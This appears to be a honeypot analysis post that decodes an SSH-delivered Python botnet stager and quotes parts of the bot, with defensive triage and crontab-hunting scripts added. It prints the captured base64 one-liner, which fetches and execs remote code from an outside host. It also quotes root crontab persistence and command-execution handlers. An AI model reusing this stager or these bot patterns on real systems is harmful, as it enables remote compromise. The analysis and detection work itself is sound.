Another nice SSH honeypot catch:
uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgICAgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYWdlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &
Decoded, that blob is a small stager: it loops forever, fetches http://k.zsw8.cc/Api/, base64-decodes the response, exec()s it, swallows any exception and sleeps 300 seconds before trying again. What it downloads is a complete Python program, the actual bot. (The stager never imports time itself; it only gets past the sleep because the fetched program does, so a failed first download would kill it with a NameError.)
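A quick way to triage a catch like this offline, as an added example for this post (not the attacker's code and not part of the original write-up): pull every base64 literal handed to b64decode() out of the captured command, decode it even though the log viewer wrapped it across lines, follow nested layers, and list the indicators you want first (URLs, exec() use, beacon interval). The captured command is the one from the log above; the regexes and the nesting limit are this example's own choices.

```python
"""Offline triage of a captured "python -c ... b64decode('...')" one-liner.

Added example for this post; it is not the attacker's code and not part of
the original write-up. It pulls every base64 literal passed to b64decode()
out of a captured shell command, decodes it even when a log viewer wrapped
the literal across lines, follows nested layers, and lists the indicators an
analyst wants first: URLs, exec() use and the beacon interval.
"""
import base64
import binascii
import re

# The honeypot-captured command from the log above, kept wrapped across
# three lines exactly as it appeared, to show the decoder tolerates that.
CAPTURED = """nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC
AgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYW
dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &"""

# Regexes are this example's own choices, not anything from the post.
B64_CALL = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")
SLEEP_RE = re.compile(r"time\.sleep\(\s*(\d+)\s*\)")


def extract_b64_literals(text):
    """Base64 string literals handed to b64decode(), with all whitespace removed."""
    return [re.sub(r"\s+", "", m) for m in B64_CALL.findall(text)]


def decode_literal(blob):
    """Decode one literal; repair missing '=' padding; return '' if it is not base64."""
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return ""


def triage(command, max_depth=3):
    """Decode up to max_depth nested stagers and collect indicators from all of them."""
    stages = []
    pending = [command]
    for _ in range(max_depth):
        found = []
        for text in pending:
            for blob in extract_b64_literals(text):
                decoded = decode_literal(blob)
                if decoded:
                    stages.append(decoded)
                    found.append(decoded)  # a decoded layer may itself carry a literal
        if not found:
            break
        pending = found
    joined = "\n".join(stages)
    sleep = SLEEP_RE.search(joined)
    return {
        "stages": stages,
        "urls": sorted(set(URL_RE.findall(joined))),
        "uses_exec": re.search(r"\bexec\(", joined) is not None,
        "imports_time": re.search(r"^\s*import\s+time\b", joined, re.M) is not None,
        "sleep_seconds": int(sleep.group(1)) if sleep else None,
    }


if __name__ == "__main__":
    result = triage(CAPTURED)
    for i, stage in enumerate(result["stages"], 1):
        print(f"--- decoded stage {i} ---\n{stage}")
    print("URLs:", result["urls"])
    print("exec():", result["uses_exec"], "| imports time:", result["imports_time"],
          "| beacon interval (s):", result["sleep_seconds"])
```

Running it on the captured command yields one decoded stage, the single URL http://k.zsw8.cc/Api/, exec() in use, a 300 second interval and no import of time, which is the detail that makes the stager depend on the fetched program. Nothing here contacts the C2; the URL is only extracted, so the script is safe to run on a catch before anyone decides to fetch the second stage in a sandbox.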
In that program a crontab entry is made for persistence: it appends a root job to /etc/crontab that runs every six hours (the check only avoids a duplicate entry):
if runCodePath not in crontabData:
    f = open("/etc/crontab", "a+")
    f.write("\n0 */6 * * * root %s\n" % runCodePath)
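Hunting for that persistence on a suspect box is mostly a matter of reading /etc/crontab with a little structure, so here is an added example (not the bot's code and not part of the original post) that parses system crontab lines and flags jobs that match a known indicator or run as root from a directory an unprivileged intruder can normally write to. The sample crontab is constructed; its last line imitates the bot's "0 */6 * * * root <runCodePath>" entry with a hypothetical path, since the post does not show what runCodePath was.

```python
"""Hunt a system crontab for the kind of persistence the bot above installs.

Added example for this post; it is not the bot's code and not part of the
original write-up. It parses /etc/crontab-style lines (five time fields, a
user, then the command) and flags jobs that either match a known indicator
or run as root from a directory an unprivileged intruder can normally write
to. The crontab text is constructed for the example; the last line imitates
the "0 */6 * * * root <runCodePath>" entry the bot appends, using a
hypothetical path, since the post does not show what runCodePath was.
"""
import re
import shlex

# Prefixes a root cron job should practically never execute from.
# This list is an assumption for the example; tune it per environment.
SUSPECT_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/.")

# Five time fields, the user, then everything else is the command.
CRON_LINE = re.compile(r"^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

# Constructed sample: two stock distro lines plus one bot-style entry
# (the /tmp/.cache/run.py path is hypothetical).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
0 */6 * * * root /tmp/.cache/run.py
"""


def parse_system_crontab(text):
    """Return (user, command, raw_line) for each job; skip blanks, comments, VAR=value lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd"), raw))
    return jobs


def command_program(cmd):
    """First shell token of the command (the program run), '' if the line will not tokenize."""
    try:
        parts = shlex.split(cmd)
    except ValueError:
        return ""
    return parts[0] if parts else ""


def find_suspicious_jobs(text, indicators=()):
    """Return (reason, raw_line) pairs; indicator hits take precedence over path heuristics."""
    findings = []
    for user, cmd, raw in parse_system_crontab(text):
        hit = next((ioc for ioc in indicators if ioc and ioc in cmd), None)
        if hit:
            findings.append(("matches indicator " + hit, raw))
        elif user == "root" and command_program(cmd).startswith(SUSPECT_PREFIXES):
            findings.append(("root job runs from " + command_program(cmd), raw))
    return findings


if __name__ == "__main__":
    for reason, line in find_suspicious_jobs(SAMPLE_CRONTAB):
        print(f"[!] {reason}: {line}")
```

The distro entries pass because their program is cd or test, while the bot-style line is flagged as a root job started from /tmp. Feed the same function the per-user spool files as well (they have no user column, so the regex would need five fields instead of six), and pass the paths or domains from your catch as indicators to get exact hits first.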
Then it uploads data about the compromised host to the herder:
my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
f = urllib.urlopen(apiURL, urllib.urlencode(my_data))
and waits for commands:
if data.has_key("download") and data["download"]:
    DownExec(data["download"], task_id)
if data.has_key("cmd") and data["cmd"]:
    CmdExec(data["cmd"], task_id)
I wonder what would happen if the computer name were a beef-xss hook or something...?